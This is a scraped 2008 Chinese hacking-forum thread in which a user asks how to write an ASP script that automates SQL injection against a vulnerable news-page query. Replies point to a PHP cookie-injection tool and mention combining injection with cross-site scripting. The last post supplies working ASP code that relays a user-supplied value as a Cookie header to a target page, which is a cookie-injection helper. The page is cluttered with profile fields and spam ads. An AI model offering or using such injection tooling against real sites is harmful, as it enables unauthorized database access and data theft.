s37su37

Rank: 5 Rank: 5

帖子: 251
积分: 667
威望: 1075
金钱: 829
在线时间: 2 小时

1楼 跳转到 » 倒序看帖

打印

字体大小: tT

发表于 2008-7-20 18:01 | 只看该作者

[讨论]请问如何用ASP写自动注入脚本？

脚本, ASP, 自动, 讨论

[讨论]请问如何用ASP写自动注入脚本？
议题作者：落叶纷飞
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

请问如何用ASP写自动注入脚本啊？

漏洞代码如：
......
select * from news where id = & request("id") &

......

该如何写自动注入脚本呢？

oscar

3.A.S.T士兵

Rank: 1

帖子: 6
积分: 9
威望: 12
金钱: 12
在线时间: 0 小时

2楼

发表于 2008-7-20 18:01 | 只看该作者

没明白你的意思，何谓“自动注入”I love amethyst！

帖子177 精华0 积分3591 阅读权限100 性别男来自浙江在线时间215 小时注册时间2007-1-18 最后登录2008-7-18 查看个人网站
查看详细资料引用报告回复 TOP 良辰择日，预测咨询，公司改名，权威易经

netbee201

晶莹剔透§烈日灼然

TOP

gmcc-lxx

3.A.S.T士兵

Rank: 1

帖子: 13
积分: 20
威望: 26
金钱: 24
在线时间: 0 小时

3楼

发表于 2008-7-20 18:01 | 只看该作者

你说的是自动防注入吧。。。
帖子2 精华0 积分7 阅读权限40 性别男在线时间36 小时注册时间2006-7-8 最后登录2008-7-20 查看详细资料引用报告回复 TOP 良辰择日，预测咨询，公司改名，权威易经

落叶纷飞

荣誉会员

TOP

sj7981

3.A.S.T士兵

Rank: 1

帖子: 14
积分: 21
威望: 27
金钱: 27
在线时间: 0 小时

4楼

发表于 2008-7-20 18:01 | 只看该作者

就是说，怎么写个脚本去对这个注入点进行注入啊？
帖子119 精华0 积分3244 阅读权限100 性别男在线时间143 小时注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用报告回复 TOP

樱花浪子

荣誉会员

TOP

佛硬

3.A.S.T士兵

Rank: 1

帖子: 25
积分: 30
威望: 34
金钱: 32
在线时间: 0 小时

5楼

发表于 2008-7-20 18:01 | 只看该作者

欠钱弄过PHP的COOKIE注入程序，你可以把他那个拿过来改下，还是非要弄ASP的？？
帖子16 精华0 积分51 阅读权限100 在线时间52 小时注册时间2006-6-17 最后登录2008-7-20 查看个人网站
查看详细资料引用报告回复 TOP 良辰择日，预测咨询，公司改名，权威易经

落叶纷飞

荣誉会员

TOP

融化冰河

3.A.S.T士兵

Rank: 1

帖子: 16
积分: 24
威望: 31
金钱: 31
在线时间: 0 小时

6楼

发表于 2008-7-20 18:01 | 只看该作者

引用:
原帖由樱花浪子于 2008-6-28 23:01 发表

欠钱弄过PHP的COOKIE注入程序，你可以把他那个拿过来改下，还是非要弄ASP的？？
哪里有啊？？给我个地址好么？谢谢了

晕，我只是想用asp来实现，用asp来实现应该要用到xmlhttp把？？

帖子119 精华0 积分3244 阅读权限100 性别男在线时间143 小时注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

独孤依人

荣誉会员

TOP

dgyys

3.A.S.T士兵

Rank: 1

帖子: 7
积分: 11
威望: 14
金钱: 14
在线时间: 0 小时

7楼

发表于 2008-7-20 18:02 | 只看该作者

VBS可以实现，ASP发包太慢
不要说VBS和ASP没有区别
试试就知道了脚本安全小组：Www.Cnsst.Org MSN:cn557@hotmail.com 我们这帮兄弟，永远的兄弟——We are not the only ones,but we will try to be the best！——All In Script 脚本渗透自用利器开发中……
帖子298 精华12 积分3962 阅读权限100 性别男在线时间901 小时注册时间2006-4-22 最后登录2008-7-18 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

落叶纷飞

荣誉会员

TOP

逍遥公子

3.A.S.T士兵

Rank: 1

帖子: 12
积分: 18
威望: 24
金钱: 24
在线时间: 0 小时

8楼

发表于 2008-7-20 18:02 | 只看该作者

花了几天时间终于弄了出来~~~

其实我的主要目的是能直接在web页面注射~~~

配合跨站用,嘿嘿

小鸡鸡重出江湖了~~！！
帖子119 精华0 积分3244 阅读权限100 性别男在线时间143 小时注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用报告回复 TOP

weknow

晶莹剔透§烈日灼然

TOP

wahfen

3.A.S.T士兵

Rank: 1

帖子: 6
积分: 9
威望: 12
金钱: 12
在线时间: 0 小时

9楼

发表于 2008-7-20 18:02 | 只看该作者

复制内容到剪贴板
代码:
<%
Str="id="&escape(request("FK"))
Url="http://localhost/test.asp"
response.write PostData(Url,Str)

Function PostData(PostUrl,PostCok)
  Dim Http
  Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
  With Http
.Open "GET",PostUrl,False
.SetRequestHeader "Cookie",PostCok
.Send
PostData = .ResponseBody
  End With
  Set Http = Nothing
  PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
  Dim strReturn
  Dim I, ThisCharCode, NextCharCode
  strReturn = ""
  For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
   strReturn = strReturn & Chr(ThisCharCode)
Else
   NextCharCode = AscB(MidB(vIn, I + 1, 1))
   strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
   I = I + 1
End If
  Next
  bytes2BSTR = strReturn
End Function
%>
不知道是不是LZ要的
帖子9 精华0 积分29 阅读权限40 在线时间5 小时注册时间2006-10-14 最后登录2008-7-9 查看详细资料引用报告回复 TOP

落叶纷飞

荣誉会员

TOP

catao